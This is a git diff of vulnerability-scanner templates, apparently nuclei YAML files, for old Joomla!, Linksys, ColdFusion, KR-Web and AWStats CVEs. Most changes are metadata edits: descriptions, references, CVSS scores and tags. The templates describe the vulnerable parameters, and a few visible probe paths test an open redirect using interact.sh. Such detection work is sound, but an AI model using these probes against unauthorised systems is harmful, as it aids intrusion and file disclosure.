- description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
+ description: |
+ Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8367
- - https://www.cvedetails.com/cve/CVE-2009-1496
+ - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-1496
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-1496
- tags: cve,cve2009,joomla,lfi
+ cwe-id: CWE-22
+ tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@@ -27,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1558.yaml b/cves/2009/CVE-2009-1558.yaml
index 8c6358eda1..455bf0359c 100644
--- a/cves/2009/CVE-2009-1558.yaml
+++ b/cves/2009/CVE-2009-1558.yaml
@@ -1,15 +1,22 @@
id: CVE-2009-1558
info:
- name: Linksys WVC54GCA 1.00R22/1.00R24 (Wireless-G) - Directory Traversal
+ name: Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
+ description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference:
- https://www.exploit-db.com/exploits/32954
+ - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713
+ - http://www.vupen.com/english/advisories/2009/1173
+ - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-1558
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-1558
- tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
+ cwe-id: CWE-22
+ tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb
requests:
- method: GET
@@ -25,3 +32,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-1872.yaml b/cves/2009/CVE-2009-1872.yaml
index 96c0351e1a..bdc9a7e4fd 100644
--- a/cves/2009/CVE-2009-1872.yaml
+++ b/cves/2009/CVE-2009-1872.yaml
@@ -1,19 +1,22 @@
id: CVE-2009-1872
info:
- name: Adobe Coldfusion 8 linked XSS vulnerabilies
+ name: Adobe Coldfusion <=8.0.1 - Cross-Site Scripting
author: princechaddha
severity: medium
- description: Multiple cross-site scripting (XSS) vulnerabilities in Adobe ColdFusion Server 8.0.1, 8, and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
+ description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
reference:
- - https://www.securityfocus.com/archive/1/505803/100/0/threaded
+ - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
+ - http://www.adobe.com/support/security/bulletins/apsb09-12.html
+ - http://www.dsecrg.com/pages/vul/show.php?id=122
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-1872
classification:
cve-id: CVE-2009-1872
metadata:
- verified: true
shodan-query: http.component:"Adobe ColdFusion"
- tags: cve,cve2009,adobe,xss,coldfusion
+ verified: "true"
+ tags: cve,cve2009,adobe,xss,coldfusion,tenable
requests:
- method: GET
@@ -35,3 +38,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/08/12
diff --git a/cves/2009/CVE-2009-2015.yaml b/cves/2009/CVE-2009-2015.yaml
index 687b6ba466..a474ff1b28 100644
--- a/cves/2009/CVE-2009-2015.yaml
+++ b/cves/2009/CVE-2009-2015.yaml
@@ -1,16 +1,22 @@
id: CVE-2009-2015
info:
- name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
+ name: Joomla! MooFAQ 1.0 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
+ description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
+ - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/
+ - http://www.vupen.com/english/advisories/2009/1530
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-2015
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-2015
- tags: cve,cve2009,joomla,lfi
+ cwe-id: CWE-22
+ tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-2100.yaml b/cves/2009/CVE-2009-2100.yaml
index f17696552a..10d0f59046 100644
--- a/cves/2009/CVE-2009-2100.yaml
+++ b/cves/2009/CVE-2009-2100.yaml
@@ -1,16 +1,22 @@
id: CVE-2009-2100
info:
- name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
+ name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
+ description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
+ - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-2100
+
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-2100
- tags: cve,cve2009,joomla,lfi
+ cwe-id: CWE-22
+ tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-3053.yaml b/cves/2009/CVE-2009-3053.yaml
index 796cb2ec01..2a5e91b46d 100644
--- a/cves/2009/CVE-2009-3053.yaml
+++ b/cves/2009/CVE-2009-3053.yaml
@@ -1,16 +1,22 @@
id: CVE-2009-3053
info:
- name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
+ name: Joomla! Agora 3.0.0b - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
+ description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
+ - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-3053
classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
cve-id: CVE-2009-3053
- tags: cve,cve2009,joomla,lfi
+ cwe-id: CWE-22
+ tags: cve,cve2009,joomla,lfi,edb
requests:
- method: GET
@@ -27,3 +33,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/07/06
diff --git a/cves/2009/CVE-2009-3318.yaml b/cves/2009/CVE-2009-3318.yaml
index e2c03c140a..fe8a9f6991 100644
--- a/cves/2009/CVE-2009-3318.yaml
+++ b/cves/2009/CVE-2009-3318.yaml
@@ -1,16 +1,18 @@
id: CVE-2009-3318
info:
- name: Joomla! Component com_album 1.14 - Directory Traversal
+ name: Joomla! Roland Breedveld Album 1.14 - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
+ description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-3318
+ - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/
classification:
cve-id: CVE-2009-3318
- tags: cve,cve2009,joomla,lfi
+ tags: joomla,lfi,edb,cve,cve2009
requests:
- method: GET
@@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-4202.yaml b/cves/2009/CVE-2009-4202.yaml
index cde51b56a3..72d2b72fac 100644
--- a/cves/2009/CVE-2009-4202.yaml
+++ b/cves/2009/CVE-2009-4202.yaml
@@ -1,16 +1,18 @@
id: CVE-2009-4202
info:
- name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
+ name: Joomla! Omilen Photo Gallery 0.5b - Local File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
+ description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/8870
- - https://www.cvedetails.com/cve/CVE-2009-4202
+ - http://www.vupen.com/english/advisories/2009/1494
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-4202
+ - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/
classification:
cve-id: CVE-2009-4202
- tags: cve,cve2009,joomla,lfi,photo
+ tags: cve2009,joomla,lfi,photo,edb,cve
requests:
- method: GET
@@ -27,3 +29,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml
index a8d559586b..6c15468fe8 100644
--- a/cves/2009/CVE-2009-4223.yaml
+++ b/cves/2009/CVE-2009-4223.yaml
@@ -1,16 +1,19 @@
id: CVE-2009-4223
info:
- name: KR-Web <= 1.1b2 RFI
+ name: KR-Web <=1.1b2 - Remote File Inclusion
author: geeknik
severity: high
- description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
+ description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
+ - http://www.exploit-db.com/exploits/10216
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-4223
classification:
cve-id: CVE-2009-4223
- tags: cve,cve2009,krweb,rfi
+ tags: cve,cve2009,krweb,rfi,edb
requests:
- method: GET
@@ -26,3 +29,5 @@ requests:
part: interactsh_protocol
words:
- "http"
+
+# Enhanced by mp on 2022/06/06
diff --git a/cves/2009/CVE-2009-4679.yaml b/cves/2009/CVE-2009-4679.yaml
index a6d270b89f..5b3eddb5f0 100644
--- a/cves/2009/CVE-2009-4679.yaml
+++ b/cves/2009/CVE-2009-4679.yaml
@@ -1,16 +1,19 @@
id: CVE-2009-4679
info:
- name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
+ name: Joomla! Portfolio Nexus - Remote File Inclusion
author: daffainfo
severity: high
- description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ description: |
+ Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
+ - https://nvd.nist.gov/vuln/detail/CVE-2009-4679
+ - http://web.archive.org/web/20140722130146/http://secunia.com/advisories/37760/
classification:
cve-id: CVE-2009-4679
- tags: cve,cve2009,joomla,lfi,nexus
+ tags: cve,cve2009,joomla,lfi,nexus,edb
requests:
- method: GET
@@ -27,3 +30,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/06/08
diff --git a/cves/2009/CVE-2009-5020.yaml b/cves/2009/CVE-2009-5020.yaml
index 2ad12cacca..6e9cbc2706 100644
--- a/cves/2009/CVE-2009-5020.yaml
+++ b/cves/2009/CVE-2009-5020.yaml
@@ -7,24 +7,25 @@ info:
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
+ - http://awstats.sourceforge.net/docs/awstats_changelog.txt
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2009-5020
cwe-id: CWE-601
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2020,redirect,awstats
+ tags: cve,cve2009,redirect,awstats
requests:
- method: GET
path:
- - '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
+ - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh'
+ - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13
diff --git a/cves/2009/CVE-2009-5114.yaml b/cves/2009/CVE-2009-5114.yaml
index 750d54d5cd..5af5b4b502 100644
--- a/cves/2009/CVE-2009-5114.yaml
+++ b/cves/2009/CVE-2009-5114.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
+ - http://websecurity.com.ua/2628/
+ - https://exchange.xforce.ibmcloud.com/vulnerabilities/74321
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2009-5114
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2009,lfi
+ tags: edb,cve,cve2009,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0157.yaml b/cves/2010/CVE-2010-0157.yaml
index 27b02b1ed4..da7e3a7f63 100644
--- a/cves/2010/CVE-2010-0157.yaml
+++ b/cves/2010/CVE-2010-0157.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10943
- https://www.cvedetails.com/cve/CVE-2010-0157
+ - http://web.archive.org/web/20151023032409/http://secunia.com/advisories/37896/
+ - http://packetstormsecurity.org/1001-exploits/joomlabiblestudy-lfi.txt
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0157
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb,packetstorm
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0219.yaml b/cves/2010/CVE-2010-0219.yaml
index 271add009d..1599e7084c 100644
--- a/cves/2010/CVE-2010-0219.yaml
+++ b/cves/2010/CVE-2010-0219.yaml
@@ -8,6 +8,8 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2010-0219
- https://knowledge.broadcom.com/external/article/13994/vulnerability-axis2-default-administrato.html
+ - http://www.rapid7.com/security-center/advisories/R7-0037.jsp
+ - http://www.vupen.com/english/advisories/2010/2673
classification:
cve-id: CVE-2010-0219
metadata:
diff --git a/cves/2010/CVE-2010-0467.yaml b/cves/2010/CVE-2010-0467.yaml
index 82f7ef4d83..3fe2911280 100644
--- a/cves/2010/CVE-2010-0467.yaml
+++ b/cves/2010/CVE-2010-0467.yaml
@@ -8,13 +8,15 @@ info:
reference:
- https://www.exploit-db.com/exploits/11282
- https://www.cvedetails.com/cve/CVE-2010-0467
+ - http://web.archive.org/web/20210121194037/https://www.securityfocus.com/bid/37987/
+ - http://www.chillcreations.com/en/blog/ccnewsletter-joomla-newsletter/ccnewsletter-106-security-release.html
+ remediation: Apply all relevant security patches and upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
cvss-score: 5.8
cve-id: CVE-2010-0467
cwe-id: CWE-22
- remediation: Apply all relevant security patches and upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0696.yaml b/cves/2010/CVE-2010-0696.yaml
index 011cddc99d..13c6825f6c 100644
--- a/cves/2010/CVE-2010-0696.yaml
+++ b/cves/2010/CVE-2010-0696.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11447
- https://www.cvedetails.com/cve/CVE-2010-0696
+ - http://web.archive.org/web/20140805102632/http://secunia.com/advisories/38587/
+ - http://www.joomlaworks.gr/content/view/77/34/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0696
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0759.yaml b/cves/2010/CVE-2010-0759.yaml
index d624499826..06f7036b6b 100644
--- a/cves/2010/CVE-2010-0759.yaml
+++ b/cves/2010/CVE-2010-0759.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11498
- https://www.cvedetails.com/cve/CVE-2010-0759
+ - http://web.archive.org/web/20151104183037/http://secunia.com/advisories/38637/
+ - http://web.archive.org/web/20210121194344/https://www.securityfocus.com/bid/38296/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-0759
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi,plugin
+ tags: cve,cve2010,joomla,lfi,plugin,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0942.yaml b/cves/2010/CVE-2010-0942.yaml
index 47f42f196c..7da6f78f24 100644
--- a/cves/2010/CVE-2010-0942.yaml
+++ b/cves/2010/CVE-2010-0942.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11089
- https://www.cvedetails.com/cve/CVE-2010-0942
+ - http://packetstormsecurity.org/1001-exploits/joomlajvideodirect-traversal.txt
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0942
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0943.yaml b/cves/2010/CVE-2010-0943.yaml
index 0004004c0b..7e876effea 100644
--- a/cves/2010/CVE-2010-0943.yaml
+++ b/cves/2010/CVE-2010-0943.yaml
@@ -8,9 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
+ - http://web.archive.org/web/20210121193737/https://www.securityfocus.com/bid/37692/
+ - http://web.archive.org/web/20140724215426/http://secunia.com/advisories/33486/
classification:
cve-id: CVE-2010-0943
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0944.yaml b/cves/2010/CVE-2010-0944.yaml
index feed3f23e9..f4466848fc 100644
--- a/cves/2010/CVE-2010-0944.yaml
+++ b/cves/2010/CVE-2010-0944.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
+ - http://packetstormsecurity.org/1001-exploits/joomlajcollection-traversal.txt
+ - http://www.exploit-db.com/exploits/11088
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0944
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve2010,joomla,lfi,edb,packetstorm,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0972.yaml b/cves/2010/CVE-2010-0972.yaml
index b645bee4fd..8407ae95f5 100644
--- a/cves/2010/CVE-2010-0972.yaml
+++ b/cves/2010/CVE-2010-0972.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11738
- https://www.cvedetails.com/cve/CVE-2010-0972
+ - http://web.archive.org/web/20140804152652/http://secunia.com/advisories/38925/
+ - http://www.exploit-db.com/exploits/11738
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0972
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: edb,cve,cve2010,joomla,lfi
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0982.yaml b/cves/2010/CVE-2010-0982.yaml
index 9d72d6cee7..d01504ad83 100644
--- a/cves/2010/CVE-2010-0982.yaml
+++ b/cves/2010/CVE-2010-0982.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10942
- https://www.cvedetails.com/cve/CVE-2010-0982
+ - http://web.archive.org/web/20210121193625/https://www.securityfocus.com/bid/37581/
+ - http://web.archive.org/web/20151104182451/http://secunia.com/advisories/37917/
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0982
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-0985.yaml b/cves/2010/CVE-2010-0985.yaml
index 5380a21392..bf22a5fe1c 100644
--- a/cves/2010/CVE-2010-0985.yaml
+++ b/cves/2010/CVE-2010-0985.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/10948
- https://www.cvedetails.com/cve/CVE-2010-0985
+ - http://web.archive.org/web/20210623092041/https://www.securityfocus.com/bid/37560
+ - http://www.exploit-db.com/exploits/10948
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-0985
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1056.yaml b/cves/2010/CVE-2010-1056.yaml
index 785da305f0..e7acf71db9 100644
--- a/cves/2010/CVE-2010-1056.yaml
+++ b/cves/2010/CVE-2010-1056.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11760
- https://www.cvedetails.com/cve/CVE-2010-1056
+ - http://web.archive.org/web/20210121194803/https://www.securityfocus.com/bid/38741/
+ - http://web.archive.org/web/20151023104850/http://secunia.com/advisories/38982/
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1056
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1081.yaml b/cves/2010/CVE-2010-1081.yaml
index 22ecf2057d..846d1ba7cc 100644
--- a/cves/2010/CVE-2010-1081.yaml
+++ b/cves/2010/CVE-2010-1081.yaml
@@ -8,10 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
+ - http://www.corejoomla.com/component/content/article/1-corejoomla-updates/40-community-polls-v153-security-release.html
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1081
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1217.yaml b/cves/2010/CVE-2010-1217.yaml
index cc51307f4b..71b5ad9a37 100644
--- a/cves/2010/CVE-2010-1217.yaml
+++ b/cves/2010/CVE-2010-1217.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11814
- https://www.cvedetails.com/cve/CVE-2010-1217
+ - http://www.packetstormsecurity.org/1003-exploits/joomlajetooltip-lfi.txt
+ - http://web.archive.org/web/20210624111408/https://www.securityfocus.com/bid/38866
+ remediation: Apply all relevant security patches and product upgrades.
classification:
cve-id: CVE-2010-1217
- remediation: Apply all relevant security patches and product upgrades.
- tags: cve,cve2010,joomla,lfi,plugin
+ tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1219.yaml b/cves/2010/CVE-2010-1219.yaml
index c6181997c6..7fc13086f6 100644
--- a/cves/2010/CVE-2010-1219.yaml
+++ b/cves/2010/CVE-2010-1219.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11757
- https://www.cvedetails.com/cve/CVE-2010-1219
+ - http://web.archive.org/web/20161009134632/http://secunia.com/advisories/38952
+ - http://web.archive.org/web/20210617075625/https://www.securityfocus.com/bid/38746
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1219
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
+ tags: cve,cve2010,joomla,lfi,edb
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1302.yaml b/cves/2010/CVE-2010-1302.yaml
index 3b0228cac5..1f25c7cecb 100644
--- a/cves/2010/CVE-2010-1302.yaml
+++ b/cves/2010/CVE-2010-1302.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11978
- https://www.cvedetails.com/cve/CVE-2010-1302
+ - http://web.archive.org/web/20210121195144/https://www.securityfocus.com/bid/39108/
+ - http://web.archive.org/web/20140805062036/http://secunia.com/advisories/39200/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1302
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi,graph
+ tags: edb,cve,cve2010,joomla,lfi,graph
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1304.yaml b/cves/2010/CVE-2010-1304.yaml
index c36e99c091..c2e0e955f7 100644
--- a/cves/2010/CVE-2010-1304.yaml
+++ b/cves/2010/CVE-2010-1304.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/11998
- https://www.cvedetails.com/cve/CVE-2010-1304
+ - http://web.archive.org/web/20210518080735/https://www.securityfocus.com/bid/39174
+ - http://www.exploit-db.com/exploits/11998
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1304
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi,status
+ tags: cve2010,joomla,lfi,status,edb,cve
requests:
- method: GET
diff --git a/cves/2010/CVE-2010-1305.yaml b/cves/2010/CVE-2010-1305.yaml
index 775f47b85a..4250249b6b 100644
--- a/cves/2010/CVE-2010-1305.yaml
+++ b/cves/2010/CVE-2010-1305.yaml
@@ -8,10 +8,12 @@ info:
reference:
- https://www.exploit-db.com/exploits/12065
- https://www.cvedetails.com/cve/CVE-2010-1305
+ - http://extensions.joomla.org/extensions/e-commerce/shopping-cart/7951
+ - http://web.archive.org/web/20140806165126/http://secunia.com/advisories/39351/
+ remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-1305
- remediation: Upgrade to a supported version.
- tags: cve,cve2010,joomla,lfi
